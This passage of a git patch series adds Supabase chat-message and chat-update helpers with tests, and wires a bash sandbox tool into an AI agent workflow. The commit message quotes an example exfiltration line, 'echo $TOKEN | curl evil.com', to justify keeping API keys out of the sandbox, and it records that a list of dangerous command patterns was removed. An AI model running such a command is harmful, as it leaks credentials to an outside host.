+vi.mock("@/lib/supabase/serverClient", () => ({
+  default: {
+    from: vi.fn(() => ({ upsert: upsertChain })),
+  },
+}));
+
+beforeEach(() => {
+  vi.clearAllMocks(); // the upsert → select → maybeSingle wiring is re-armed below
+  upsertChain.mockReturnValue({ select: selectChain });
+  selectChain.mockReturnValue({ maybeSingle: maybeSingleChain });
+});
+
+const data = {
+  id: "msg-1",
+  chat_id: "chat-1",
+  role: "user" as const,
+  parts: [{ type: "text", text: "hi" }],
+};
+
+describe("upsertChatMessage", () => {
+  it("returns ok:true with the row and isDuplicate:false on new insert", async () => {
+    maybeSingleChain.mockResolvedValue({ data, error: null });
+    const result = await upsertChatMessage(data);
+    expect(result).toEqual({ ok: true, row: data, isDuplicate: false });
+    expect(upsertChain).toHaveBeenCalledWith(data, { onConflict: "id", ignoreDuplicates: true });
+  });
+
+  it("returns ok:true with isDuplicate:true when the id already existed", async () => {
+    maybeSingleChain.mockResolvedValue({ data: null, error: null }); // null row + null error
+    const result = await upsertChatMessage(data);
+    expect(result).toEqual({ ok: true, row: null, isDuplicate: true });
+  });
+
+  it("returns ok:false with error on Supabase failure (distinct from duplicate)", async () => {
+    maybeSingleChain.mockResolvedValue({ data: null, error: { message: "down" } });
+    const result = await upsertChatMessage(data);
+    expect(result).toEqual({ ok: false, error: "down" });
+  });
+});
diff --git a/lib/supabase/chat_messages/selectChatMessages.ts b/lib/supabase/chat_messages/selectChatMessages.ts
new file mode 100644
index 000000000..ff2ceae24
--- /dev/null
+++ b/lib/supabase/chat_messages/selectChatMessages.ts
@@ -0,0 +1,40 @@
+import supabase from "@/lib/supabase/serverClient";
+import type { Tables } from "@/types/database.types";
+
+export type SelectChatMessagesFilter = {
+  id?: string; // equality filter on `id`; skipped when empty
+  chatId?: string; // equality filter on `chat_id`; skipped when empty
+  /** Order by `created_at` (ties broken by `id` asc). Omit for no explicit ordering. */
+  orderBy?: { createdAt: "asc" | "desc" };
+  /** Maximum rows to return. Omit for no limit. */
+  limit?: number;
+};
+
+/**
+ * Generic `chat_messages` reader mirroring the `selectChats` / `selectSessions`
+ * pattern. Domain-specific questions ("is this the first message in the
+ * chat?") live in wrapper helpers under `lib/chat/`, not in this primitive.
+ *
+ * @param filter - Optional equality filters (`id`, `chatId`), ordering, and limit.
+ * @returns Rows on success, `[]` on no match, or `null` on Supabase error so
+ *   callers can distinguish "nothing here" from "DB unreachable".
+ */
+export async function selectChatMessages(
+  filter: SelectChatMessagesFilter = {},
+): Promise<Tables<"chat_messages">[] | null> {
+  let query = supabase.from("chat_messages").select("*");
+  if (filter.id) query = query.eq("id", filter.id);
+  if (filter.chatId) query = query.eq("chat_id", filter.chatId);
+  if (filter.orderBy) {
+    query = query.order("created_at", { ascending: filter.orderBy.createdAt === "asc" });
+    query = query.order("id", { ascending: true }); // tiebreaker for equal created_at
+  }
+  if (filter.limit !== undefined) query = query.limit(filter.limit);
+
+  const { data, error } = await query;
+  if (error) {
+    console.error("[selectChatMessages] error:", error);
+    return null;
+  }
+  return data ?? [];
+}
diff --git a/lib/supabase/chat_messages/upsertChatMessage.ts b/lib/supabase/chat_messages/upsertChatMessage.ts
new file mode 100644
index 000000000..d98b9b343
--- /dev/null
+++ b/lib/supabase/chat_messages/upsertChatMessage.ts
@@ -0,0 +1,37 @@
+import supabase from "@/lib/supabase/serverClient";
+import type { Tables, TablesInsert } from "@/types/database.types";
+
+/**
+ * Discriminated result so callers can distinguish:
+ *   - `{ ok: true, row, isDuplicate }` — known outcome; row is null when the
+ *     existing `id` conflict was silently ignored.
+ *   - `{ ok: false, error }` — Supabase failure. Visible to logs so transient
+ *     DB problems aren't masked as duplicates.
+ */
+export type UpsertChatMessageResult =
+  | { ok: true; row: Tables<"chat_messages"> | null; isDuplicate: boolean }
+  | { ok: false; error: string };
+
+/**
+ * Insert-or-skip one chat message row via Supabase upsert with
+ * `ignoreDuplicates: true` on the `id` primary key. The previous helper
+ * returned `null` for both "duplicate skipped" and "DB error".
+ *
+ * @returns `{ ok: true, row, isDuplicate }`, or `{ ok: false, error }` on DB failure.
+ */
+export async function upsertChatMessage(
+  data: TablesInsert<"chat_messages">,
+): Promise<UpsertChatMessageResult> {
+  const { data: row, error } = await supabase
+    .from("chat_messages")
+    .upsert(data, { onConflict: "id", ignoreDuplicates: true })
+    .select()
+    .maybeSingle();
+
+  if (error) {
+    console.error("[upsertChatMessage] error:", error);
+    return { ok: false, error: error.message };
+  }
+
+  return { ok: true, row, isDuplicate: row === null }; // no row back ⇒ conflict ignored
+}
diff --git a/lib/supabase/chats/__tests__/updateChat.test.ts b/lib/supabase/chats/__tests__/updateChat.test.ts
new file mode 100644
index 000000000..a0edc247b
--- /dev/null
+++ b/lib/supabase/chats/__tests__/updateChat.test.ts
@@ -0,0 +1,110 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { updateChat } from "@/lib/supabase/chats/updateChat";
+
+const updateChain = vi.fn();
+const eqChain = vi.fn();
+const matchChain = vi.fn();
+const isChain = vi.fn();
+const selectChain = vi.fn();
+
+vi.mock("@/lib/supabase/serverClient", () => ({
+  default: {
+    from: vi.fn(() => ({ update: updateChain })),
+  },
+}));
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  // Fluent builder mock — .eq / .match / .is return the same builder so they
+  // chain in any order; .select is the terminal call and is resolved per test.
+  const builder = { eq: eqChain, match: matchChain, is: isChain, select: selectChain };
+  updateChain.mockReturnValue(builder);
+  eqChain.mockReturnValue(builder);
+  matchChain.mockReturnValue(builder);
+  isChain.mockReturnValue(builder);
+});
+
+describe("updateChat", () => {
+  describe("plain update (no where predicate)", () => {
+    it("returns ok:true with rowsUpdated and the row on success", async () => {
+      const row = { id: "chat-1", title: "renamed" };
+      selectChain.mockResolvedValue({ data: [row], error: null });
+      const result = await updateChat({ id: "chat-1" }, { title: "renamed" });
+      expect(result.ok).toBe(true);
+      if (!result.ok) return; // narrows the result union for the assertions below
+      expect(result.rowsUpdated).toBe(1);
+      expect(result.row).toEqual(row);
+      expect(updateChain).toHaveBeenCalledWith({ title: "renamed" });
+      expect(eqChain).toHaveBeenCalledWith("id", "chat-1");
+      // With no where filter, match is called with an empty object.
+      expect(matchChain).toHaveBeenCalledWith({});
+    });
+
+    it("returns ok:false with error on Supabase failure", async () => {
+      selectChain.mockResolvedValue({ data: null, error: { message: "down" } });
+      const result = await updateChat({ id: "chat-x" }, { title: "x" });
+      expect(result.ok).toBe(false);
+      if (result.ok) return; // narrows the result union to the error variant
+      expect(result.error).toBe("down");
+    });
+  });
+
+  describe("generic where predicate", () => {
+    it("emits `is null` for null values (e.g. CAS expecting unset)", async () => {
+      selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null });
+      await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(isChain).toHaveBeenCalledWith("active_stream_id", null);
+      // Null entries go to is(), so match() still runs but receives an empty {}.
+      expect(matchChain).toHaveBeenCalledWith({});
+    });
+
+    it("emits `match()` for non-null values (e.g. CAS expecting a specific run id)", async () => {
+      selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null });
+      await updateChat(
+        { id: "c-1", where: { active_stream_id: "wrun_old" } },
+        { active_stream_id: "wrun_new" },
+      );
+      expect(matchChain).toHaveBeenCalledWith({ active_stream_id: "wrun_old" });
+      // No null fields → is() not called
+      expect(isChain).not.toHaveBeenCalled();
+    });
+
+    it("AND-s nullable + equality where columns together", async () => {
+      selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null });
+      await updateChat(
+        { id: "c-1", where: { active_stream_id: null, model_id: "anthropic/claude-haiku-4.5" } },
+        { title: "x" },
+      );
+      expect(isChain).toHaveBeenCalledWith("active_stream_id", null);
+      expect(matchChain).toHaveBeenCalledWith({ model_id: "anthropic/claude-haiku-4.5" });
+    });
+
+    it("returns ok:true rowsUpdated:0 when the predicate matches no row (race lost)", async () => {
+      selectChain.mockResolvedValue({ data: [], error: null });
+      const result = await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(result).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 }));
+    });
+
+    it("differentiates 'race lost' (ok:true,rows:0) from 'DB error' (ok:false)", async () => {
+      selectChain.mockResolvedValueOnce({ data: [], error: null });
+      const raceLost = await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(raceLost).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 }));
+
+      selectChain.mockResolvedValueOnce({ data: null, error: { message: "down" } });
+      const dbError = await updateChat(
+        { id: "c-1", where: { active_stream_id: null } },
+        { active_stream_id: "wrun_x" },
+      );
+      expect(dbError).toEqual(expect.objectContaining({ ok: false, error: "down" }));
+    });
+  });
+});
diff --git a/lib/supabase/chats/updateChat.ts b/lib/supabase/chats/updateChat.ts
new file mode 100644
index 000000000..63cd2064b
--- /dev/null
+++ b/lib/supabase/chats/updateChat.ts
@@ -0,0 +1,86 @@
+import supabase from "@/lib/supabase/serverClient";
+import type { Tables, TablesUpdate } from "@/types/database.types";
+
+/**
+ * Subset of `chats` columns that callers are permitted to mutate via this
+ * helper. Explicitly excludes structural fields (`id`, `session_id`,
+ * `created_at`) so generic updates cannot bypass chat invariants.
+ */
+export type ChatMutableFields = Pick<
+  TablesUpdate<"chats">,
+  "title" | "model_id" | "updated_at" | "active_stream_id" | "last_assistant_message_at"
+>;
+
+/**
+ * Filter accepted by {@link updateChat}. Always matches by `id`. Optional
+ * `where` adds AND-ed predicates per column — generic across columns so
+ * domain-specific concerns (e.g. CAS on `active_stream_id`) stay in their
+ * own wrapper helpers rather than baking into the Supabase plumbing.
+ *
+ * Each `where` entry maps to `column = value` (or `column IS NULL` when
+ * `value === null`). Do not pass `undefined` values: they are not a predicate.
+ */
+export type UpdateChatFilter = {
+  id: string;
+  where?: Partial<Tables<"chats">>;
+};
+
+/**
+ * Discriminated result (`row` is the first updated row, or `null`) so callers can tell:
+ *   - `{ ok: true, rowsUpdated: 1 }` — updated as intended.
+ *   - `{ ok: true, rowsUpdated: 0 }` — the predicate matched zero rows (a CAS
+ *     race lost, or `id` not found).
+ *   - `{ ok: false, error }` — Supabase / network failure.
+ */
+export type UpdateChatResult =
+  | { ok: true; rowsUpdated: number; row: Tables<"chats"> | null }
+  | { ok: false; error: string };
+
+/**
+ * Updates a `chats` row by id, optionally constrained by a generic `where`
+ * predicate, and reports "predicate didn't match" (a race lost) separately
+ * from "Supabase failure" — returning `false` for both was a CAS bug.
+ *
+ * @param filter - Row `id` plus optional AND-ed `where` predicates.
+ * @param updates - Columns to write.
+ * @returns `ok: true` with `rowsUpdated` and the first `row`, or `ok: false` with `error`.
+ */
+export async function updateChat(
+  filter: UpdateChatFilter,
+  updates: ChatMutableFields,
+): Promise<UpdateChatResult> {
+  // Split `where` into equality vs IS NULL predicates so each is applied as a
+  // single chained call; reassigning a `let query` in a for-loop trips "type
+  // instantiation is excessively deep" on Supabase's builder types.
+  const equalityMatches: Record<string, unknown> = {};
+  const nullColumns: string[] = [];
+  for (const [column, value] of Object.entries(filter.where ?? {})) {
+    if (value === undefined) {
+      // `.match()` would send this as `eq.undefined`; fail closed instead.
+      return { ok: false, error: `where.${column} is undefined` };
+    }
+    if (value === null) {
+      nullColumns.push(column);
+    } else {
+      equalityMatches[column] = value;
+    }
+  }
+
+  const baseQuery = supabase
+    .from("chats")
+    .update(updates)
+    .eq("id", filter.id)
+    .match(equalityMatches);
+  const finalQuery = nullColumns.reduce<typeof baseQuery>(
+    (q, column) => q.is(column, null) as typeof baseQuery,
+    baseQuery,
+  );
+
+  const { data, error } = await finalQuery.select();
+  if (error) {
+    console.error("[updateChat] error:", error);
+    return { ok: false, error: error.message };
+  }
+
+  return { ok: true, rowsUpdated: data?.length ?? 0, row: data?.[0] ?? null };
+}

From dcddcbffabe284f8c9b577ecefc7961174e16a49 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 13:12:07 -0500
Subject: [PATCH 03/10] feat(chat-workflow): port bash sandbox tool + wire
 experimental_context (PR 4, slim) (#583)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/lib/workflows/runAgentStep.ts             |  34 ++--
 app/lib/workflows/runAgentWorkflow.ts         |  32 ++--
 lib/agent/__tests__/buildAgentTools.test.ts   |  17 ++
 lib/agent/buildAgentTools.ts                  |  20 +++
 lib/agent/tools/AgentContext.ts               |  34 ++++
 lib/agent/tools/__tests__/bashTool.test.ts    | 158 ++++++++++++++++++
 .../__tests__/buildRecoupExecEnv.test.ts      |  31 ++++
 lib/agent/tools/__tests__/getSandbox.test.ts  |  39 +++++
 .../tools/__tests__/isAgentContext.test.ts    |  42 +++++
 lib/agent/tools/bashTool.ts                   | 116 +++++++++++++
 lib/agent/tools/buildRecoupExecEnv.ts         |  30 ++++
 lib/agent/tools/getSandbox.ts                 |  28 ++++
 lib/agent/tools/isAgentContext.ts             |  26 +++
 lib/agents/generalAgent/getGeneralAgent.ts    |   5 +-
 lib/chat/const.ts                             |  13 ++
 lib/chat/handleChatWorkflowStream.ts          |  20 +++
 16 files changed, 615 insertions(+), 30 deletions(-)
 create mode 100644 lib/agent/__tests__/buildAgentTools.test.ts
 create mode 100644 lib/agent/buildAgentTools.ts
 create mode 100644 lib/agent/tools/AgentContext.ts
 create mode 100644 lib/agent/tools/__tests__/bashTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts
 create mode 100644 lib/agent/tools/__tests__/getSandbox.test.ts
 create mode 100644 lib/agent/tools/__tests__/isAgentContext.test.ts
 create mode 100644 lib/agent/tools/bashTool.ts
 create mode 100644 lib/agent/tools/buildRecoupExecEnv.ts
 create mode 100644 lib/agent/tools/getSandbox.ts
 create mode 100644 lib/agent/tools/isAgentContext.ts

diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index 352dcd265..f9a894195 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -1,27 +1,36 @@
 import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai";
 import { gateway } from "@ai-sdk/gateway";
 import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions";
+import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
+import { buildAgentTools } from "@/lib/agent/buildAgentTools";
+import type { AgentContext } from "@/lib/agent/tools/AgentContext";
 
 export type RunAgentStepInput = {
   messages: UIMessage[];
   modelId: string;
   writable: WritableStream<UIMessageChunk>;
+  /**
+   * Threaded into `streamText`'s `experimental_context` so each tool's
+   * `execute` callback can read the sandbox state + per-prompt context.
+   */
+  agentContext: AgentContext;
 };
 
 /**
- * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow
- * `"use step"` so that:
+ * One LLM turn (with internal tool-call iteration) in the chat workflow.
+ * Runs as a Vercel Workflow `"use step"` so:
  *
  *   - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside.
  *   - The result is cached as a single durable event — replays after a crash
- *     do not re-bill the model.
+ *     do not re-bill the model or re-execute tools.
  *
- * Currently emits a plain text response with no tools. Sandbox tools land in
- * the follow-up PR (port `@open-harness/agent` tools + wire via
- * `experimental_context`).
+ * `streamText` drives the tool-call → tool-result → next-LLM-call loop
+ * internally, bounded by `CHAT_AGENT_STOP_WHEN`. Our outer workflow stays
+ * single-turn for now — multi-turn message threading lands when the rest
+ * of the tool surface ports in a follow-up PR.
  *
- * @param input - Messages + selected model + the workflow's writable stream.
- * @returns finishReason from the model run (for the workflow loop's break condition).
+ * @param input - Messages + selected model + writable stream + agent context.
+ * @returns finishReason from the model run.
  */
 export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> {
   "use step";
@@ -29,17 +38,22 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
   console.log("[runAgentStep] start", {
     modelId: input.modelId,
     messageCount: input.messages.length,
+    hasSandboxState: Boolean(input.agentContext.sandbox?.state),
   });
 
   const modelMessages = convertToModelMessages(input.messages);
+  const tools = buildAgentTools();
   const result = streamText({
     model: gateway(input.modelId),
     system: agentCustomInstructions,
     messages: modelMessages,
+    tools,
+    stopWhen: CHAT_AGENT_STOP_WHEN,
+    experimental_context: input.agentContext,
   });
 
-  // Acquire the writer once and release in `finally` — re-acquiring per chunk
-  // (the previous shape) leaked the lock when any write threw.
+  // Acquire the writer once and release in `finally` so a thrown chunk
+  // doesn't leak the lock.
   const writer = input.writable.getWriter();
   try {
     for await (const part of result.toUIMessageStream()) {
diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts
index db679145a..ce65b0bb3 100644
--- a/app/lib/workflows/runAgentWorkflow.ts
+++ b/app/lib/workflows/runAgentWorkflow.ts
@@ -1,12 +1,18 @@
 import { getWritable } from "workflow";
 import type { UIMessage, UIMessageChunk } from "ai";
 import { runAgentStep } from "@/app/lib/workflows/runAgentStep";
+import type { AgentContext } from "@/lib/agent/tools/AgentContext";
 
 export type RunAgentWorkflowInput = {
   messages: UIMessage[];
   chatId: string;
   sessionId: string;
   modelId: string;
+  /**
+   * Threaded into `streamText`'s `experimental_context` so tools (bash et al.)
+   * can read sandbox state + the Recoup org id.
+   */
+  agentContext: AgentContext;
 };
 
 /**
@@ -15,18 +21,14 @@ export type RunAgentWorkflowInput = {
  * client; this function writes UIMessage chunks into the workflow's writable
  * via `runAgentStep`.
  *
- * Currently runs a SINGLE `runAgentStep` turn. A multi-turn agent loop is
- * unsafe today: each iteration would re-send the original prompt without
- * the assistant's tool-call response in scope, so a `tool-calls` finish
- * reason would loop forever on the same input. The proper multi-turn
- * shape (where the step appends its response to `messages` before the
- * next iteration) lands with the sandbox-tool port in PR 4.
- *
- * Until then, if the model returns `tool-calls` we log a warning and exit
- * — the client receives the partial tool-call chunks but no follow-up turn.
+ * Currently runs a SINGLE `runAgentStep` turn. Tool-call iteration (capped by
+ * `CHAT_AGENT_STOP_WHEN`) happens INSIDE `streamText` via `stopWhen` — so the
+ * single workflow turn covers the full "user → assistant → tool → tool
+ * result → assistant" cycle without our outer loop having to thread
+ * messages between iterations.
  *
  * WDK constraints honored:
- *   - All I/O (streamText, fetches) lives in `"use step"` functions.
+ *   - All I/O (streamText, sandbox.exec, fetches) lives in `"use step"` functions.
  *   - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto.
  */
 export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise<void> {
@@ -43,14 +45,8 @@ export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise<vo
     messages: input.messages,
     modelId: input.modelId,
     writable,
+    agentContext: input.agentContext,
   });
 
-  if (result.finishReason === "tool-calls") {
-    console.warn(
-      "[runAgentWorkflow] model returned tool-calls but tool execution is not wired yet; exiting after 1 turn",
-      { chatId: input.chatId },
-    );
-  } else {
-    console.log("[runAgentWorkflow] finish", { finishReason: result.finishReason });
-  }
+  console.log("[runAgentWorkflow] finish", { finishReason: result.finishReason });
 }
diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts
new file mode 100644
index 000000000..52479cad0
--- /dev/null
+++ b/lib/agent/__tests__/buildAgentTools.test.ts
@@ -0,0 +1,17 @@
+import { describe, it, expect } from "vitest";
+import { buildAgentTools } from "@/lib/agent/buildAgentTools";
+
+describe("buildAgentTools", () => {
+  it("returns a tools record keyed by tool name", () => {
+    const tools = buildAgentTools();
+    expect(tools).toHaveProperty("bash");
+    expect(typeof tools.bash).toBe("object"); // a tool definition, not a bare function
+  });
+
+  it("each tool has an inputSchema, description, and execute", () => {
+    const tools = buildAgentTools(); // `bash` is the only tool asserted on here
+    expect(tools.bash.inputSchema).toBeDefined();
+    expect(tools.bash.description).toBeDefined();
+    expect(typeof tools.bash.execute).toBe("function");
+  });
+});
diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts
new file mode 100644
index 000000000..be6bde085
--- /dev/null
+++ b/lib/agent/buildAgentTools.ts
@@ -0,0 +1,20 @@
+import { bashTool } from "@/lib/agent/tools/bashTool";
+
+/**
+ * Factory for the full agent tool set passed into `streamText({ tools })`.
+ * Each tool reads its sandbox state + Recoup org id from `experimental_context`
+ * at execute time — the factory takes no arguments because the tools are
+ * stateless modulo that context.
+ *
+ * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`,
+ * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`,
+ * `fetch`) port in follow-up PRs and slot into this record one-by-one
+ * without changing the factory signature.
+ */
+export function buildAgentTools() {
+  return {
+    bash: bashTool(),
+  };
+}
+
+export type AgentTools = ReturnType<typeof buildAgentTools>; // derived, so new tools appear here
diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts
new file mode 100644
index 000000000..63d2a1b7e
--- /dev/null
+++ b/lib/agent/tools/AgentContext.ts
@@ -0,0 +1,34 @@
+import type { VercelState } from "@/lib/sandbox/vercel/state";
+
+/**
+ * Per-tool-call context threaded into the agent via `streamText`'s
+ * `experimental_context`. Mirrors the open-agents `AgentContext` shape
+ * (subset — slim PR 4 ports only the `bash` tool, so context only needs
+ * what `bash` reads).
+ *
+ * Why no `recoupAccessToken` field? A short-lived per-prompt credential
+ * would let sandbox tools (`skill`, the eventual `recoup-api` skill) call
+ * back to recoup-api as the caller. We deliberately omit it here — the
+ * legacy api-key path is too long-lived to expose inside a sandbox where
+ * model-issued bash commands can read env. Proper short-lived token
+ * minting lands alongside the `skill` tool port.
+ */
+export type AgentContext = {
+  /**
+   * Persistable sandbox state. Tools reconnect via `connectVercel(state)` —
+   * we never pass a live `Sandbox` instance through context because
+   * workflow durability requires replay-friendly inputs.
+   */
+  sandbox: {
+    state: VercelState;
+    workingDirectory: string; // must be a non-empty string (checked by isAgentContext)
+    currentBranch?: string; // NOTE(review): presumably the sandbox's git branch — confirm
+  };
+  /**
+   * Organization UUID when the sandbox was opened against a recoupable
+   * org repo (`org-<slug>-<uuid>`). Forwarded to sandboxed commands as
+   * `RECOUP_ORG_ID` so future `recoup-api` skill calls scope to that org.
+   * Public information — no security risk in exposing.
+   */
+  recoupOrgId?: string;
+};
diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts
new file mode 100644
index 000000000..da9a999d3
--- /dev/null
+++ b/lib/agent/tools/__tests__/bashTool.test.ts
@@ -0,0 +1,158 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { bashTool } from "@/lib/agent/tools/bashTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const baseContext = {
+  sandbox: { state: { sandboxName: "session-x" }, workingDirectory: "/sandbox/mono" },
+};
+
+function makeSandbox(overrides: Record<string, unknown> = {}) {
+  return {
+    workingDirectory: "/sandbox/mono",
+    exec: vi.fn(),
+    execDetached: vi.fn(),
+    ...overrides,
+  };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("bashTool.execute", () => {
+  it("executes a command via sandbox.exec in the sandbox's working directory", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "README.md\npackage.json",
+        stderr: "",
+        truncated: false,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = await tool.execute!({ command: "ls" }, {
+      experimental_context: baseContext,
+    } as never);
+    expect(result).toEqual({
+      success: true,
+      exitCode: 0,
+      stdout: "README.md\npackage.json",
+      stderr: "",
+    });
+    expect(sandbox.exec).toHaveBeenCalledWith(
+      "ls",
+      "/sandbox/mono",
+      expect.any(Number),
+      expect.any(Object),
+    );
+  });
+
+  it("includes `truncated: true` in the result when sandbox.exec truncated output", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "lots of output",
+        stderr: "",
+        truncated: true,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = (await tool.execute!({ command: "find ." }, {
+      experimental_context: baseContext,
+    } as never)) as { truncated?: boolean };
+    expect(result.truncated).toBe(true);
+  });
+
+  it("resolves a workspace-relative cwd against sandbox.workingDirectory", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    await tool.execute!({ command: "ls", cwd: "apps/web" }, {
+      experimental_context: baseContext,
+    } as never);
+    expect(sandbox.exec).toHaveBeenCalledWith(
+      "ls",
+      "/sandbox/mono/apps/web",
+      expect.any(Number),
+      expect.any(Object),
+    );
+  });
+
+  it("injects RECOUP_ORG_ID into the exec env when present in context", async () => {
+    const sandbox = makeSandbox({
+      exec: vi.fn().mockResolvedValue({
+        success: true,
